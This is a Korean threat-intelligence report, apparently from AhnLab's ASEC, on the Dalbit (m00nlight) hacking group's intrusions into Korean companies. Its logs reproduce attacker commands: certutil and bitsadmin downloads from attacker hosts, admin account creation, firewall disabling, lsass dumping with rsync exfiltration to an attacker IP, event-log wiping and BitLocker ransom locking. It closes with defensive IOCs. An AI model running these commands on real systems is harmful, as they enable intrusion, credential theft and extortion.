달빗(Dalbit,m00nlight): 중국 해커 그룹의 APT 공격 캠페인

 

0. 개요

해당 내용은 2022년 8월 16일에 공개된 ‘국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹’ 블로그의 연장선으로, 해당 그룹의 행보를 추적한 내용이다.

국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹 – ASEC BLOG

Contents1. ASP 웹쉘i. ASPXSpy2. 권한 상승2.1. Potato2.2. 취약점 (익스플로잇)3. 프록시 & 포트 포워딩3.1. FRP3.2. HTran(LCX)4. 랜섬웨어 감염 사례(BitLocker) 최근 외부에 노출된 취약한 서버를 시작으로 하여 침투한 공격자가 내부 네트워크까지 장악하는 침해 사고가 국내 기업들을 대상으로 빈번히 이루어지고 있다. 취약한 Atlassian Confluence 서버를 대상으로 하는 공격 사례 국내 의료기관의 취약한 서버를 대상으로 유포된 미터프리터(Meterpreter) 취약…

이 그룹은 과거부터 지금까지 오픈 소스 도구를 주로 사용하고 PDB 등에 정보가 없어 프로파일링의 명확한 특징이 부족했다. 또한 C2(Command&Control) 서버는 국내 기업 서버를 악용하여 피해 기업이 조사를 따로 요청하지 않는 경우 수집할 수 있는 정보가 한정적이었다. 허나 블로그가 공개되고 공격자가 사용 중이던 국내 기업 서버가 일부 차단되자 공격자는 ‘*.m00nlight.top’ 라는 이름의 호스팅 서버를 C2 및 다운로드 서버로 사용하기 시작하였다. 따라서 ASEC에서는 이 그룹을 영어 ‘Moonlight’의 의미인 ‘달빛’에서 가져와 달빗(Dalbit, m00nlight.top)이라 명명한다.

해당 그룹은 2022년부터 지금까지 한국 기업의 50곳 이상 공격을 시도한 것으로 확인되고 있다. 현재까지 공격 받은 기업은 주로 중견이하 업체이나 대기업도 일부 포함되어 있으며, 특히 감염 기업의 30%가 국내의 특정 그룹웨어 솔루션을 사용 중인 것으로 확인되었다. 현재 해당 그룹웨어 제품에 취약점 존재 여부는 명확히 알기 어려우나, 이처럼 외부에 노출된 서버가 취약한 경우 사내 기밀 유출과 랜섬웨어 행위까지 이어져 기업에 지대한 영향을 미칠 수 있다. 또한 이 달빗(Dalbit) 그룹은 감염된 기업 중 일부를 프록시(Proxy) 및 다운로드(Download) 서버로 두어, 또 다른 기업 침투 시에 공격자의 연결책으로 사용되고 있다.

따라서 이번 달빗(Dalbit) 그룹의 공격이 의심된다면 필히 사내 보안 점검을 해야할 것으로 보이며, 잠재적인 2차 피해와 또 다른 기업 피해를 예방하기 위해 선제적 대응할 수 있도록 AhnLab에 신고를 부탁드린다.

 

1. 국내 피해 기업(산업 분류)

2022년부터 현재까지 확인된 피해 기업은 총 50 곳으로 아래와 같다. 명확히 확인되지 않는 기업은 목록에서 제외하였으며, 피해 기업은 이외에도 더 있을 것으로 추정된다.

 

각 분류에 대한 설명은 아래와 같다.

• Technology : 소프트웨어나 하드웨어를 다루는 업체
• Industrial : 기계나 도료, 철강 및 금속 등을 다루는 제조업체
• Chemical : 화장품, 제약, 플라스틱 등 업체
• Construction : 건설업체나 건설과 관련된 협회나 단체
• Automobile : 자동차 관련 제조업체
• Semiconductor : 반도체 관련 제조업체
• Education : 교육업체
• Wholesale: 도매업체
• Media : 인쇄 및 미디어업체
• Food : 음식업체
• Shipping : 화물업체
• Hospitality : 레저업체나 관광숙박업체
• Energy : 에너지 업체
• Shipbuilding : 조선업체
• Consulting : 경영 컨설팅 업체

 

2. 흐름 및 특징

2.1. 요약도

 

위 그림은 공격자가 B 기업(Company B)을 침해하는 과정이다. 해당 흐름을 간략히 소개하면 다음과 같다.

1) Inital Access 공격자는 웹 서버나 SQL 서버 등을 대상으로 취약점을 이용해 시스템에 접근 후 웹쉘과 같은 도구로 제어를 시도한다. 2) Command & Control 웹쉘을 통해 여러 해킹 도구를 다운로드한다. 해킹 도구는 권한 상승 도구와 프록시 도구 네트워크 스캔 도구 등 여러 바이너리가 포함된다. 3) Proxy & Internal Reconnaissance Proxy :  공격자는 FRP(Fast Reverse Proxy)와 같은 프록시 도구를 설치한 뒤 2-1) 공격자가 구축한 호스팅 서버나 2-2) 기감염된 다른 기업(Company A)의 서버를 통해 원격 데스크탑(RDP)으로 연결을 시도한다. Internal Reconnaissance : 네트워크 스캔 도구와 계정 탈취 도구 등을 통해 내부 정찰 및 정보를 습득한다. 4) Lateral Movement 얻은 정보를 통해 연결 가능한 다른 서버 혹은 PC로 이동한다. 이후 측면 이동이 성공한 PC에도 프록시 도구(FRP)를 설치해 공격자가 RDP로 접속할 수 있는 환경을 구성하며, 특정 계정을 추가하거나 미미카츠(Mimikatz)와 같은 자격 증명 탈취 도구를 통해 필요한 권한을 얻는다. 5) Impact 최종적으로 공격자가 원하는 정보를 모두 탈취했다면 BitLocker를 이용해 특정 드라이브를 잠그고 돈을 요구한다.

[표 1] 침해 요약도 설명

 

다음은 달빗(Dalbit) 그룹의 주요 특징으로 아래와 같다.

2.2. 달빗(Dalbit)의 특징

목록	설명
공격자 C2 서버	다운로드 및 C2(Command&Control) 서버 : 국내 기업 서버 또는 호스팅 서버 서버 중 반 이상이 국내 기업 서버 악용 호스팅 서버는 주로 *.m00nlight.top 혹은 IP 형태의 주소를 사용
RDP 제어 시도	감염 후 주로 RDP 접근 시도 RDP 연결을 위해 프록시 도구 혹은 Gotohttp 사용
프록시 도구	주요 프록시 도구는 FRP와 LCX(Htran) 이외에 NPS와 ReGeorg 등을 사용
사용자 계정 추가	net 명령어를 통해 계정 추가 계정 정보( ID : ‘main’ / PW : ‘ff0.123456’ )
오픈 소스 도구	대부분 누구나 쉽게 구할 수 있는 오픈 소스 도구 사용 특히 중국어로 작성된 도구가 많음
회피	해킹 툴, 진단 우회시 VMProtect 제품 사용 Security 이벤트 로그 삭제
탈취 정보	사용자 계정 정보 이메일 정보 화면 유출 설치된 프로그램 정보

[표 2] 달빗(Dalbit)의 특징

 

3. 사용한 도구 및 침해 과정

3.1. 사용 도구 및  악성코드

웹쉘	다운로더	권한 상승	프록시	내부 정찰
Godzilla ASPXSpy AntSword China Chopper	Certutil (Windows CMD) Bitsadmin (Windows CMD)	BadPotato JuicyPotato SweetPotato RottenPotato EFSPotato CVE-2018-8639 CVE-2019-1458	FRP LCX NPS ReGeorg	FScan NbtScan TCPScan Goon Nltest (Windows CMD)

측면 이동	정보 수집 및 유출	백도어	파일 암호화	회피
RDP PsExec RemCom Winexec	Wevtutil (Windows CMD) WMI (Windows CMD) ProcDump Dumpert EML Extractor(제작) Mimikatz Rsync	CobaltStrike MetaSploit BlueShell Ladon	BitLocker (Windows CMD)	Security 로그 삭제 (Windows CMD) 방화벽 OFF (Windows CMD) AV 제품 삭제 시도 VMProtect Packing

[표 3] 달빗(Dalbit)이 사용한 악성코드 및 해킹 도구

공격자가 직접 제작한 도구는 메일을 유출하는 도구 1건으로 보이며, 나머지는 윈도우 정상 프로그램을 사용하거나 검색 시 쉽게 구할 수 있는 도구를 사용하였다.

 

3.2. 침해 과정

3.2.1. 초기 침투

공격 대상은 주로 국내의 특정 그룹웨어가 설치된 서버나 취약한 웹 서버, 메일 서버(Exchange Server) 그리고 SQL 서버로 추정된다. 공격자는 CVE-2017-10271과 같은 WebLogic 취약점이나 파일 업로드 취약점을 악용해 웹쉘(WebShell)을 업로드하였으며, 일부는 SQL Server 의 명령 프롬프트(xp_cmdshell)를 이용한 것으로 보인다. 

공격자가 주로 사용한 웹쉘은 Godzilla, ASPXSpy, AntSword, China Chopper 순으로, Godzilla를 가장 많이 사용했으며 일부 기타 웹쉘도 확인되었다.

설치된 웹쉘의 경로는 다음과 같다.

– 인사채용(파일 업로드 취약점) D:\WEB\********recruit\css\1.ashx D:\WEB\********recruit\css\4.ashx D:\WEB\********recruit\common\conf.aspx ... – 파일 업로드 취약점 D:\UploadData\***********\****_File\Data\Award\1.ashx D:\UploadData\***********\****_File\Data\Award\2.aspx D:\UploadData\***********\****_File\Data\Award\3.aspx D:\**웹서비스\********\*****Editor\sample\photo_uploader\File\conf.aspx D:\**웹서비스\********_논문투고\Include\file.aspx ... – 특정 그룹웨어 D:\Web\(그룹웨어)\cop\1.ashx D:\Web\(그룹웨어)\app\4.ashx D:\Web\(그룹웨어)\bbs\4.asmx D:\Web\(그룹웨어)\erp\tunnel.aspx (ReGeorg) D:\inetpub\(그룹웨어)\image\2.asmx D:\inetpub\(그룹웨어)\image\2.aspx C:\(그룹웨어)\Web\(그룹웨어)\cop\conf.aspx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.ashx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.asmx C:\(그룹웨어)\Web\(그룹웨어)\cop\1.aspx … – 메일 서버(Exchange Server) D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aa.aspx D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\11.aspx C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_ldaj2kwn.dll … – Weblogic D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer\gcx62x\war\modifyregistryhelp.jsp D:\***\wls1035\domains\************\servers\*******\tmp\************\wls-wsat\zfa3iv\war\eee.jsp D:\***\wls1035\domains\************\servers\*******\tmp\************\wls-wsat\zfa3iv\war\error.jsp D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\123.jsp D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\test.jsp     D:\Oracle\**********\user_projects\domains\*************\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\aaa.jsp … –Tomcat C:\(Tomcat)\webapps\dd\sb.jsp C:\(Tomcat)\webapps\ddd\index.jsp C:\(Tomcat)\webapps\docs\update.jsp C:\(Tomcat)\webapps\tmp\shell.jsp

[표 4] 웹쉘이 업로드된 경로

 

3.2.2. 다운로드

공격자는 기본적으로 설치된 윈도우 정상 프로그램을 통해 다른 해킹 도구를 다운로드한다. 보통 침투 시 웹쉘을 사용하기 때문에 cmd와 같은 명령어 프로세스를 제외하면 부모 프로세스는 w3wp.exe, java.exe, sqlserver.exe, tomcat*.exe 와 같은 웹 서버 프로세스에 의해 수행된다. 다운로드 받는 파일은 권한 상승 도구와 프록시 도구 그리고 네트워크 스캔 도구 등 공격자가 필요한 파일을 받아온다. 다운로드 명령은 아래와 같다.

(참고로 악용된 국내 기업 서버의 경우 주소를 전체 공개하지 않는다.)

1) Certutil

> certutil -urlcache -split -f hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/update.zip c:\programdata\update.exe (frpc) > certutil -urlcache -split -f hxxp://121.167.***[.]***/temp/8.txt c:\programdata\8.ini (frpc.ini) > certutil  -urlcache -split -f hxxp://103.118.42[.]208:8080/frpc.exe frpc.exe …

[표 5] Certutil 다운로드 로그

2) Bitsadmin

> bitsadmin  /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc) > bitsadmin  /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini) …

[표 6] Bitsadmin 다운로드 로그

공격자가 다운로드 받은 해킹 도구 및 악성코드는 주로 아래의 경로에서 확인되었다. 

%ALLUSERSPROFILE% %SystemDrive%\temp %SystemDrive%\perflogs %SystemDrive%\nia %SystemDrive%\.tmp %SystemRoot% %SystemRoot%\debug %SystemRoot%\temp

[표 7] 달빗(Dalbit) 그룹이 사용한 주 디렉토리

따라서 침해가 의심되는 경우 해당 경로의 파일을 점검할 필요가 있다.

 

3.2.3. 권한 상승 및 계정 추가

공격자는 권한 상승을 위해 Potato(BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato)와 깃허브에 공개된 POC (CVE-2018-8639, CVE-2019-1458)를 주로 사용한다. 권한 상승 후 아래와 같은 계정을 추가하는 것이 특징이다.

아래의 sp.exe는 SweetPotato 도구이다.

> sp.exe “whaomi” (권한 확인) > sp.exe “netsh advfirewall set allprofiles state off” (방화벽 OFF) > sp.exe “net user main ff0.123456 /add & net localgroup administrators main /add” (계정 추가)

[표 8] SweetPotato 사용 로그

관심있게 봐야할 부분은 공격자가 추가한 계정 이름이다. 이는 다른 침해 기업에서도 ‘main’이라는 공격자의 계정이 확인되었다.

공격자는 계정을 추가하는 방법 외에 탈취된 관리자 계정을 사용하기도 하였다.

> wmic  /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$  process call create “cmd.exe /c c:\temp\s.bat”

[표 9] 관리자 계정 실행 로그

 

3.2.4. 프록시 설정

공격자는 서버에 침투 후 RDP 통신을 사용하기 위해 프록시를 사용하여 접근한다. 프록시 도구는 주로 FRP와 LCX가 사용되었으며, 일부 기업에서는 ReGeorg나 NPS 또는 RSOCKS 등도 확인되었다. 또한 특정 침해 기업에서는 FRP와 LCX 등 여러 프록시 도구가 한 곳에서 확인되기도 하였으며, 내부 전파까지 이어진 경우 다수의 FRP 설정 파일(.ini)이 발견되기도 하였다. 이는 접근 가능한 PC 중 먹잇감이 많은 경우 공격자가 FRP를 추가로 설치하면서 다수의 설정 파일이 사용된 것으로 보고 있다. 또 해당 그룹이 사용하는 LCX는 오픈 소스와 기능은 동일하지만 깃허브에 공개된 버전이 아닌 중국인이 임의로 컴파일한 바이너리가 사용되었다. 

이러한 FRP와 LCX 등 프록시 도구에는 포워딩 방식이나 지원하는 프로토콜의 차이가 존재한다. 그러나 TI 보고서 ‘다양한 원격 제어 도구들을 악용하는 공격 사례 분석 보고서‘에서 차이에 대한 설명과 실 감염 사례 그리고 재현 및 네트워크 패킷까지 모두 다뤘기 때문에 이 글에서는 해당 부분을 따로 언급하지 않는다. 

 

1) FRP(Fast Reverse Proxy)

이 그룹에 침해 당한 경우 서버와 PC 디바이스 모두에 FRP 설정 파일(.ini)이 확인되었다. 아래는 실제 침해 기업의 한 사례이다.

특히 달빗(Dalbit) 그룹은 주로 Socks5 프로토콜을 이용해 통신하였다. Socks5 프로토콜은 OSI 7계층 중 5계층 프로토콜로 4계층과 7계층 사이에 있어 HTTP, FTP, RDP 등 여러 요청을 처리할 수 있다. 이에 따라 공격자는 공격자 서버에 Socks5를 다룰 수 있는 Proxifier와 같은 프록시 연결 도구를 이용한다면 RDP를 통한 원격제어가 가능하며, 내부 PC로 연결 가능한 경우 측면 이동(Lateral Movement) 또한 수행할 수 있다. 즉, 설정 파일을 Socks5 프로토콜로 해두면 더 이상 수정할 필요 없이 여러 요청을 처리할 수 있어 더 자유롭다. 

 

다음은 공격자가 사용한 FRP 파일 이름 및 명령어이다. 아래는 가장 많이 사용된 순으로 정리하였다.

• FRP 파일명

update.exe debug.exe main.exe info.exe Agent.exe frpc.exe test.exe zabbix.exe winh32.exe cmd.exe

[표 10] FRP 파일명

• FRP 명령어

> update.exe -c frpc.ini > update.exe -c 8080.ini > update.exe -c 8.ini > info.zip -c frpc__8083.ini > debug.exe -c debug.ini > debug.exe -c debug.log > debug.exe -c debug.txt > frpc.exe -c frpc__2381.ini > cmd.exe /c c:\temp\****\temp\frpc.ini …

[표 11] FRP 실행 로그

또한 특정 기업에서는 FRP를 ‘debug’라는 이름으로 작업 스케줄러(schtasks)에 등록하여 지속성을 유지하였다. 아래와 같이 등록된 스케줄러가 실행된 것이 확인되었다.

> schtasks  /tn debug /run

[표 12] 작업스케줄러로 실행한 로그

 

2) LCX(Htran)

달빗(Dalbit)은 특정 중국인이 컴파일한 LCX(Htran) 바이너리를 사용하였다. 이는 기존 바이너리와 기능이 동일하지만 바이너리 제작자의 닉네임이 명시되어 있다.

해당 바이너리를 제작한 사람은 닉네임이 ‘折羽鸿鹄'(QQ:56345566)으로 확인된다. 이 제작자가 공격자일 가능성은 매우 낮지만, 이 바이너리는 단순히 검색만으로 다운 받을 수 없기 때문에 공격자는 중국과 연관이 있을 것으로 추정된다.

설치된 파일명 및 실행은 다음과 같다.

• LCX 파일명

lcx3.exe lcx.exe update.exe

[표 13] LCX 파일명

 

• LCX 명령어

> update.exe -slave 1.246.***.*** 110 127.0.0.1 3389 > lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389 …

[표 14] LCX 명령어 로그

위 LCX C2는 국내 기업 서버이기 때문에 마스킹하여 표기 하였다.

 

3.2.5. 내부 정찰

네트워크 스캔에는 주로 Fscan과 NBTScan 도구가 흔히 사용되었으며, 일부 사례에서는 TCP Scan 및 Goon이 확인되었다.

Goon은 Golang으로 만들어진 네트워크 스캐닝 도구로 기본적인 포트 스캔 뿐만 아니라 Tomcat, MSSQL, MYSQL의 계정 등도 스캔할 수 있는 도구이다. 해당 도구 또한 중국어로 만들어진 것을 확인할 수 있다.

 

3.2.6. 정보 탈취

주 탈취 정보는 LSASS Dump 정보, 특정 계정의 EML 파일이며 기업에 따라 WMIC 명령어로 설치된 프로그램을 확인하거나 특정 피해자 PC에서는 일정 시간마다 공격자 서버에 화면 이미지를 송출하는 것이 확인되었다.

1) 자격 증명 정보 추출(LSASS Dump)

공격자는 타겟에 따라 미미카츠(Mimikatz)를 설치하지 않고 자격 증명 정보 추출을 시도하였다. 이는 Lsass.exe 프로세스를 덤프하는 방법으로, 이 덤프 파일 내부에는 크리덴셜 정보가 포함되어 있기 때문에 Mimikatz나 Pypykatz 같은 도구로 해당 PC의 자격 증명 정보를 얻을 수 있다. 참고로 Mimikatz에 대한 상세한 내용은 TI 보고서 ‘미미카츠를 이용한 내부망 전파 기법 분석 보고서‘에서 확인할 수 있다.

공격자가 Mimikatz 없이 수행한 자격 증명 정보를 탈취 방법은 다음과 같다.

1-1) Dumpert

오픈소스 Dumpert는 API 후킹 우회 및 OS 버전에 맞게 수행하는 도구로 MiniDumpWriteDump() API를 사용해 lsass.exe 프로세스를 덤프한다. 공격자는 코드를 수정하여 덤프 파일의 경로 변경 및 로그 출력 기능 등을 제거하였다.

위 사진을 보면 우측의 경우 경로 및 출력되는 문자열이 제거된 것 외에 동일함을 볼 수 있다.

현재까지 확인된 덤프 파일의 경로는 모두 ‘%SystemRoot%\temp’로 아래와 같다.

%SystemRoot%\temp\duhgghmpert.dmp %SystemRoot%\temp\dumpert.dmp %SystemRoot%\temp\tarko.dmp %SystemRoot%\temp\lsa.txt …

[표 15] Lsass 덤프 파일 경로

 

1-2 ) Procdump

Procdump 도구는 Microsoft에서 제공하는 정상 유틸리티 프로그램으로 프로세스 덤프 기능을 제공한다. 공격자는 해당 도구를 통해 아래와 같이 덤프를 수행하였다.

이후 공격자는 Rsync(Remote Sync)라는 도구를 통해 덤프 파일 공격자 서버로 전송하였다. 아래는 공격자가 정보 유출을 시도한 실제 사례이다.

> svchost.exe -accepteula -ma lsass.exe web_log.dmp > rsync  -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip

[표 16] Procdump 실행 및 rsync를 사용한 로그

 

2) 메일 추출

 

해당 샘플은 Golang으로 만들어진 메일 추출 도구로 현재 유일하게 공격자가 만든 도구로 추정되고 있다. 이는기업의 Exchange 메일 서버를 대상으로  EWS(Exchange Web Service)를 통해 특정 계정 메일을 EML파일로 추출하는 기능을 가지고 있다. 인자로는 Exchange 서버 주소와, 계정명, 해당 계정의 NTLM 패스워드 해시, 날짜 및 시간 등이 존재한다. 실행 시 해당 계정의 모든 메일함에서 인자로 받은 시간을 기준으로 모든 메일을 추출하여 EML 파일로 저장한다.

참고로 해당 바이너리의 PDB 정보는는 ‘fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff’로 무의미하다.

 

3) 화면 유출

공격자는 특정 PC의 화면을 공격자 서버로 송출하였다. 현재 화면을 캡쳐하는 바이너리가 확인되지 않았으나, 감염된 PC의 화면이 송출되는 공격자 서버가 확인되었다. 이는 5~10초 간격으로 특정 기업의 침해 PC의 화면이 송출되고 있었다.

공격자의 화면 송출 서버 : hxxp://91.217.139[.]117:8080/1.bat

 

이는 온전히 이미지만 송출되었으며 원격으로 조종할 수 없고 오디오 등은 출력되지 않았다.

또한 화면이 송출되고 있던 공격자 서버(91.217.139[.]117)는 또 다른 기업에서 다운로드 서버로도 사용되고 있었다.

>certutil -urlcache -split -f hxxp://91.217.139[.]117:8080/calc32.exe >certutil -split -urlcache -f hxxp://91.217.139[.]117:8443/log.ini c:\temp >bitsadmin  /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc) >bitsadmin  /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini)

[표 17] 공격자 서버(91.217.139[.]117)의 다른 로그

 

4) 설치된 프로그램 조회 및 로그인 정보

공격자는 WMIC 명령어를 통해 설치된 프로그램을 확인하였다.

> wmic product get name,version

[표 18] 공격자가 설치된 프로그램을 조회한 방법

 

또한 이벤트 로그 중 특정 이벤트 ID를 발생한 도메인 계정 정보에 대해 수집하였다. 생성된 파일은 c:\temp\EvtLogon.dat에 존재한다.

Event ID	의미
4624	로그인 성공
4768	커버로스 인증 요청
4776	NTLM 인증 시도

[표 19] 공격자가 사용한 이벤트 ID의 의미

> wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat

[표 20] wevtutil 명령어 로그

 

3.2.7. 파일 암호화

해당 내용은 과거 블로그를 통해 자세히 소개되었다. 공격자는 윈도우 유틸리티인 BitLocker를 통해 특정 드라이브를 암호화하여 금액을 요구하였다. 현재 여러 피해 기업이 더 확인되고 있다.

• BitLocker 명령어

> “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T  > manage-bde  -lock  -ForceDismount F: > manage-bde  -lock  -ForceDismount e: > “c:\windows\system32\bitlockerwizardelev.exe” e:\ t > “c:\windows\system32\bitlockerwizardelev.exe” f:\ u

[표 21] BitLocker 로그

아래는 공격자가 사용하는 랜섬노트이다. 공격자는 startmail.com, onionmail.com과 같은 익명 메일 서비스를 이용하였다.

랜섬노트 다운로드로 추정되는 명령어는 다음과 같다.

> certutil -urlcache -split -f hxxp://175.24.32[.]228:8888/readme c:\windows\temp\readme

[표 22] 랜섬노트 다운로드로 추정되는 로그

 

3.2.8. 우회

1) VMProtect Packing

공격자는 바이너리를 업로드 후 진단이 되었을 때 VMProtect로 패킹을 하여 진단 우회를 시도하였다.

– 권한 상승 도구 %ALLUSERSPROFILE%\badpotatonet4.exe %ALLUSERSPROFILE%\BadPotatoNet4.vmp.exe %ALLUSERSPROFILE%\SweetPotato.exe %ALLUSERSPROFILE%\SweetPotato.vmp.exe %ALLUSERSPROFILE%\jc.vmp.exe %SystemDrive%\nia\juicypotato.vmp1.exe %SystemDrive%\nia\juicypotato.vmp.exe … – 프록시 도구 E:\WEB\*****\data\frpc.vmp.exe %ALLUSERSPROFILE%\lcx.exe %ALLUSERSPROFILE%\lcx_VP.exe %SystemDrive%\Temp\lcx.exe %SystemDrive%\Temp\lcx_VP.exe %SystemDrive%\Temp\svchost.exe (FRP) %SystemDrive%\Temp\frpc.vmp.exe …

[표 23] VMP로 패킹된 파일

 

2) Wevtutil을 이용한 윈도우 이벤트 로그 삭제

Security 이벤트 로그 삭제 > cmd.exe /c wevtutil cl security Application 로그 삭제 > cmd.exe wevtutil.exe el > cmd.exe wevtutil.exe cl “application”

[표 24] 윈도우 이벤트 로그 삭제

 

3) 방화벽 OFF

sp.exe “netsh advfirewall set allprofiles state off”

[표 25] 방화벽 OFF

 

4. 결론

달빗(Dalbit) 해킹 그룹은 국내 기업의 취약한 서버를 대상으로 공격을 시도하였으며 이는 중견 이하 업체뿐만 아니라 일부 대기업에서도 로그가 올라오고 있다. 특히 피해 기업 중 30%가 국내의 특정 그룹웨어 제품을 사용 중인 것으로 확인되었다. 또 해당 그룹은 침입 초기에 사용한 웹쉘부터 최종 단계인 랜섬웨어까지 누구나 쉽게 구할 수 있는 도구를 사용하고 있으며 이 중, 중국 커뮤니티에서 구한 것으로 추정되는 프록시 도구나 중국어로 설명된 도구 그리고 이 글에서 언급되지 않은 중국어 도구도 존재한다. 따라서 공격자는 중국어로 소개되는 도구를 주로 사용한 것으로 보아 중국과 일부 연관이 있을 것으로 추정된다.

서버 관리자는 감염 의심 시 이 글에서 소개된 공격자의 주 다운로드 경로와 주 계정명(‘main’) 그리고 IOC 등을 확인해야 하며, 만약 의심 징후 확인 시 안랩에 즉시 신고하여 2차 피해를 줄여야 할 것으로 보인다. 또한 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존 취약점을 사전 방지하며 외부에 공개된 서버 중 관리되지 않는 서버가 있다면 필히 점검해야 할 것으로 보인다.

 

5. IOC

참고로 ASEC 블로그에서는 공격자가 악용 중인 국내 기업 서버의 IP를 공개하지 않는다.

• Mitre Attack

Execution	Persistence	Privilege Escalation	Credential Access	Discovery	Defense Evasion	Lateral Movement	Collection	Exfiltration	Command and Control	Impact	Resource Development
– Command and Scripting Interpreter(T1059) – Windows Management Instrumentation(T1047) – System Service(T1569)	– Scheduled Task/Job(T1053) – Create Account(T1136) – Server Software Component(T1505) – Account Manipulation(T1098)	– Access Token Manipulation(T1134) – Exploitation for Privilege Escalation(T1068)	– OS Credential Dumping (T1003)	– Remote System Discovery(T1018) – Network Service Discovery(T1046)	– Impair Defenses(T1562) – Indicator Removal(T1070)	– Remote Services(T1021) – Lateral Tool Transfer(T1570)	– Data from Local System(T1005) – Account Discovery: Email Account(1087.003)  – Email Collection(T1114) – Screen Capture(T1113)	– Exfiltration Over Web Service(T1567)	– Proxy(T1090) – Ingress Tool Transfer(T1105)	– Data Encrypted for Impact(T1486)	– Stage Capabilities: Upload Malware(T1608.001)

[표 26] Mitre Attack

• 진단명

WebShell/Script.Generic (2020.12.11.09) WebShell/ASP.ASpy.S1361 (2021.02.02.03) WebShell/ASP.Generic.S1855 (2022.06.22.03) WebShell/ASP.Small.S1378 (2021.02.24.02) WebShell/JSP.Godzilla.S1719(2021.12.03.00) WebShell/JSP.Chopper.SC183868(2022.10.15.01) WebShell/JSP.Generic.S1363 (2021.01.27.03) Backdoor/Script.Backdoor (2015.01.04.00) WebShell/JSP.Generic.S1956 (2022.11.14.00) Trojan/Script.Frpc (2022.12.17.00) JS/Webshell (2011.08.08.03) HackTool/Win.Fscan.C5334550(2023.01.27.00) HackTool/Win.Fscan.C5230904(2022.10.08.00) HackTool/Win.Fscan.R5229026(2022.10.07.03) Trojan/JS.Agent(2022.03.16.02) Unwanted/Win32.TCPScan.R33304(2012.08.17.00) HackTool/Win.Scanner.C5220929(2022.08.09.02) HackTool/Win.SweetPotato.R506105 (2022.08.04.01) Exploit/Win.BadPotato.R508814 (2022.08.04.01) HackTool/Win.JuicyPotato.R509932 (2022.08.09.03) HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00) Exploit/Win.JuicyPotato.C425839(2022.08.04.01) Exploit/Win.SweetPotato.C4093454 (2022.08.04.01) Trojan/Win.Escalation.R524707(2022.10.04.02) Trojan/Win.Generic.R457163(2021.12.09.01) HackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06) Malware/Win64.Generic.C3164061 (2019.04.20.01) Malware/Win64.Generic.C3628819 (2019.12.11.01) Exploit/Win.Agent.C4448815 (2021.05.03.03) Trojan/Win.Generic.C4963786 (2022.02.11.04) Trojan/Win.Exploit.C4997833 (2022.03.08.01) Exploit/Win.Agent.C5224192 (2022.08.17.00) Exploit/Win.Agent.C5224193 (2022.08.17.00) Trojan/Win32.RL_Mimikatz.R290617(2019.09.09.01) Trojan/Win32.Mimikatz.R262842(2019.04.06.00) Trojan/Win.Swrort.R450012(2021.11.14.01) HackTool/Win.Lsassdump.R524859(2022.10.05.00) HackTool/Win.ProxyVenom.C5280699(2022.10.15.01) Unwanted/Win.Frpc.C5222534 (2022.08.13.01) Unwanted/Win.Frpc.C5218508 (2022.08.03.03) Unwanted/Win.Frpc.C5218510 (2022.08.03.03) Unwanted/Win.Frpc.C5218513 (2022.08.03.03) HackTool/Win.Frpc.5222544 (2022.08.13.01) HackTool/Win.Frp.C4959080 (2022.02.08.02) HackTool/Win.Frp.C5224195 (2022.08.17.00) Unwanted/Win.Frpc.C5162558 (2022.07.26.03) Malware/Win.Generic.C5173495 (2022.06.18.00) HackTool/Win.LCX.C5192157 (2022.07.04.02) HackTool/Win.LCX.R432995(2023.01.06.01) HackTool/Win.Rsocx.C5280341(2022.10.15.00) Backdoor/Win.BlueShell.C5272202(2022.10.05.00) Trojan/Win.BlueShell.C5280704(2022.10.15.01) Backdoor/Win.CobaltStrike.R360995(2022.09.20.00) Unwanted/Win.Extractor.C5266516(2022.10.01.00) Trojan/Win.RemCom.R237878(2023.01.07.00)

 

MD5

011cedd9932207ee5539895e2a1ed60a

0311ee1452a19b97e626d24751375652

0359a857a22c8e93bc43caea07d07e23

059d98dcb83be037cd9829d31c096dab

07191f554ed5d9025bc85ee1bf51f975

URL

http[:]//45[.]93[.]28[.]103[:]8080/

http[:]//45[.]93[.]31[.]75[:]7777/

http[:]//moack[.]co[.]ltd/

http[:]//sk1[.]m00nlight[.]top/

https[:]//45[.]136[.]186[.]175/

FQDN

moack[.]co[.]ltd

IP

101[.]43[.]121[.]50

103[.]118[.]42[.]208

205[.]185[.]122[.]95

45[.]136[.]186[.]19

45[.]93[.]31[.]122